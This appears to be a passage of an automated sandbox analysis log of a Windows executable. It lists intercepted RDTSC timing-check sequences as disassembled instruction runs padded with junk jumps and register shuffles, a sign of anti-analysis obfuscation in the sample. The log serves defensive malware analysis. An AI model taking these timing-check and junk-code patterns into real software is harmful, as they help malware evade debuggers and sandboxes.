Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60D03 second address: 6E60D07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60D07 second address: 6E60D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60D0D second address: 6E60D3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, ax 0x00000010 call 00007F9D00F1DB66h 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60D3C second address: 6E60D42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60D42 second address: 6E60D8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9D00F1DB69h 0x0000000e nop 0x0000000f jmp 00007F9D00F1DB5Eh 0x00000014 lea eax, dword ptr [ebp-18h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F9D00F1DB67h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60D8F second address: 6E60D95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60D95 second address: 6E60D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60D99 second address: 6E60D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60E75 second address: 6E60EB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F9D00F1DB5Ch 0x00000015 adc ch, FFFFFF98h 0x00000018 jmp 00007F9D00F1DB5Bh 0x0000001d popfd 0x0000001e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60EB1 second address: 6E60EEF instructions: 0x00000000 rdtsc 0x00000002 mov esi, 32E4424Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F9D01181AB4h 0x0000000f sub ch, FFFFFFF8h 0x00000012 jmp 00007F9D01181AABh 0x00000017 popfd 0x00000018 popad 0x00000019 mov edx, 74E806ECh 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 mov edi, 76CD74D4h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60EEF second address: 6E60F62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 pushfd 0x00000006 jmp 00007F9D00F1DB64h 0x0000000b xor al, FFFFFF88h 0x0000000e jmp 00007F9D00F1DB5Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 sub eax, eax 0x00000019 pushad 0x0000001a mov bl, EBh 0x0000001c pushfd 0x0000001d jmp 00007F9D00F1DB5Eh 0x00000022 and cx, B2E8h 0x00000027 jmp 00007F9D00F1DB5Bh 0x0000002c popfd 0x0000002d popad 0x0000002e lock cmpxchg dword ptr [edx], ecx 0x00000032 jmp 00007F9D00F1DB66h 0x00000037 pop edi 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60F62 second address: 6E60F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60F66 second address: 6E60F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60F6A second address: 6E60F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60F70 second address: 6E60F76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60F76 second address: 6E60F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60F7A second address: 6E60F7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60F7E second address: 6E60FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9D01181AB4h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60FA0 second address: 6E60FAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60FAF second address: 6E60FC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D01181AB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60FC7 second address: 6E6104C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F9D6EEBC25Ah 0x00000011 jmp 00007F9D00F1DB66h 0x00000016 mov edx, dword ptr [ebp+08h] 0x00000019 pushad 0x0000001a mov si, EE2Dh 0x0000001e pushfd 0x0000001f jmp 00007F9D00F1DB5Ah 0x00000024 xor cx, EEC8h 0x00000029 jmp 00007F9D00F1DB5Bh 0x0000002e popfd 0x0000002f popad 0x00000030 mov eax, dword ptr [esi] 0x00000032 jmp 00007F9D00F1DB66h 0x00000037 mov dword ptr [edx], eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F9D00F1DB67h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6104C second address: 6E61082 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9D01181AAFh 0x00000008 jmp 00007F9D01181AB8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esi+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E61082 second address: 6E61086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E61086 second address: 6E6108A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6108A second address: 6E61090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E61090 second address: 6E61132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 3756CF71h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+04h], eax 0x0000000e jmp 00007F9D01181AB3h 0x00000013 mov eax, dword ptr [esi+08h] 0x00000016 jmp 00007F9D01181AB6h 0x0000001b mov dword ptr [edx+08h], eax 0x0000001e pushad 0x0000001f mov si, 70FDh 0x00000023 movzx esi, di 0x00000026 popad 0x00000027 mov eax, dword ptr [esi+0Ch] 0x0000002a jmp 00007F9D01181AB5h 0x0000002f mov dword ptr [edx+0Ch], eax 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F9D01181AACh 0x00000039 jmp 00007F9D01181AB5h 0x0000003e popfd 0x0000003f call 00007F9D01181AB0h 0x00000044 pushad 0x00000045 popad 0x00000046 pop eax 0x00000047 popad 0x00000048 mov eax, dword ptr [esi+10h] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E61132 second address: 6E61136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E61136 second address: 6E6113C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6113C second address: 6E611AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0421B274h 0x00000008 pushfd 0x00000009 jmp 00007F9D00F1DB5Dh 0x0000000e adc cx, 3836h 0x00000013 jmp 00007F9D00F1DB61h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [edx+10h], eax 0x0000001f jmp 00007F9D00F1DB5Eh 0x00000024 mov eax, dword ptr [esi+14h] 0x00000027 jmp 00007F9D00F1DB60h 0x0000002c mov dword ptr [edx+14h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F9D00F1DB67h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E611AC second address: 6E611CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+18h] 0x0000000e jmp 00007F9D01181AACh 0x00000013 mov dword ptr [edx+18h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E611CF second address: 6E611D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E611D3 second address: 6E611D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E611D9 second address: 6E6120D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+1Ch] 0x0000000c jmp 00007F9D00F1DB60h 0x00000011 mov dword ptr [edx+1Ch], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6120D second address: 6E61213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E61213 second address: 6E61222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB5Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E61222 second address: 6E61253 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+20h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9D01181AADh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E61253 second address: 6E61263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E61263 second address: 6E612AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+20h], eax 0x0000000b pushad 0x0000000c movsx edi, cx 0x0000000f popad 0x00000010 mov eax, dword ptr [esi+24h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F9D01181AB3h 0x0000001c adc al, 0000000Eh 0x0000001f jmp 00007F9D01181AB9h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E612AB second address: 6E612BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E612BB second address: 6E61317 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+24h], eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F9D01181AB1h 0x00000016 sub al, FFFFFFA6h 0x00000019 jmp 00007F9D01181AB1h 0x0000001e popfd 0x0000001f call 00007F9D01181AB0h 0x00000024 pop esi 0x00000025 popad 0x00000026 popad 0x00000027 mov eax, dword ptr [esi+28h] 0x0000002a pushad 0x0000002b mov ax, di 0x0000002e push eax 0x0000002f push edx 0x00000030 mov ax, bx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E61317 second address: 6E61358 instructions: 0x00000000 rdtsc 0x00000002 mov di, 4978h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [edx+28h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F9D00F1DB68h 0x00000015 jmp 00007F9D00F1DB65h 0x0000001a popfd 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E61358 second address: 6E6139A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 1B20h 0x00000007 jmp 00007F9D01181AB9h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ecx, dword ptr [esi+2Ch] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9D01181AB8h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6139A second address: 6E613A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB0DA1 second address: 6EB0DF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F9D01181AB7h 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F9D01181AB6h 0x00000013 mov ebp, esp 0x00000015 jmp 00007F9D01181AB0h 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB0DF0 second address: 6EB0E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB62h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB0E06 second address: 6EB0E0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E5073E second address: 6E50743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E50743 second address: 6E50751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D01181AAAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E50751 second address: 6E50790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F9D00F1DB67h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F9D00F1DB66h 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E50790 second address: 6E50796 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6DF0082 second address: 6DF0088 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6DF0671 second address: 6DF068B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, BAh 0x0000000f push eax 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6DF068B second address: 6DF06AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D00F1DB5Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6DF06AF second address: 6DF06B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6DF06B6 second address: 6DF06D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9D00F1DB64h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6DF06D4 second address: 6DF0715 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F9D01181AB6h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9D01181AB7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6DF0715 second address: 6DF072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6DF0A95 second address: 6DF0A9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6DF0A9B second address: 6DF0A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E2001D second address: 6E20021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E20021 second address: 6E20027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E20027 second address: 6E2008E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov edi, 0C4A4BF4h 0x00000010 pushfd 0x00000011 jmp 00007F9D01181AADh 0x00000016 adc ch, FFFFFFB6h 0x00000019 jmp 00007F9D01181AB1h 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F9D01181AAEh 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F9D01181AB7h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E2008E second address: 6E200DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 5BAAh 0x00000007 pushfd 0x00000008 jmp 00007F9D00F1DB5Bh 0x0000000d add cx, 304Eh 0x00000012 jmp 00007F9D00F1DB69h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b and esp, FFFFFFF0h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push edi 0x00000022 pop ecx 0x00000023 call 00007F9D00F1DB5Fh 0x00000028 pop ecx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E200DC second address: 6E200E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E200E1 second address: 6E2017B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F9D00F1DB62h 0x0000000a add eax, 6560EF28h 0x00000010 jmp 00007F9D00F1DB5Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 sub esp, 44h 0x0000001c jmp 00007F9D00F1DB66h 0x00000021 xchg eax, ebx 0x00000022 jmp 00007F9D00F1DB60h 0x00000027 push eax 0x00000028 pushad 0x00000029 mov si, bx 0x0000002c mov bl, AAh 0x0000002e popad 0x0000002f xchg eax, ebx 0x00000030 pushad 0x00000031 mov esi, 2CB88A01h 0x00000036 popad 0x00000037 push esi 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F9D00F1DB65h 0x00000041 adc ax, 0A06h 0x00000046 jmp 00007F9D00F1DB61h 0x0000004b popfd 0x0000004c push eax 0x0000004d pop edx 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E2017B second address: 6E20181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E20181 second address: 6E201BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007F9D00F1DB5Bh 0x00000010 xchg eax, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx edx, ax 0x00000017 pushfd 0x00000018 jmp 00007F9D00F1DB5Ch 0x0000001d add esi, 37B2CB08h 0x00000023 jmp 00007F9D00F1DB5Bh 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E201BE second address: 6E2027C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9D01181AAFh 0x00000009 adc esi, 1A915B4Eh 0x0000000f jmp 00007F9D01181AB9h 0x00000014 popfd 0x00000015 push eax 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F9D01181AB3h 0x00000022 jmp 00007F9D01181AB3h 0x00000027 popfd 0x00000028 mov si, 082Fh 0x0000002c popad 0x0000002d xchg eax, edi 0x0000002e jmp 00007F9D01181AB2h 0x00000033 mov edi, dword ptr [ebp+08h] 0x00000036 pushad 0x00000037 mov cl, 9Ch 0x00000039 mov dx, A36Eh 0x0000003d popad 0x0000003e mov dword ptr [esp+24h], 00000000h 0x00000046 pushad 0x00000047 movsx ebx, si 0x0000004a pushad 0x0000004b call 00007F9D01181AAAh 0x00000050 pop esi 0x00000051 mov ch, bh 0x00000053 popad 0x00000054 popad 0x00000055 lock bts dword ptr [edi], 00000000h 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F9D01181AB4h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E2027C second address: 6E2028B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E2028B second address: 6E202DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F9D71233C31h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bh, 9Bh 0x00000014 pushfd 0x00000015 jmp 00007F9D01181AB4h 0x0000001a adc esi, 75624ED8h 0x00000020 jmp 00007F9D01181AABh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
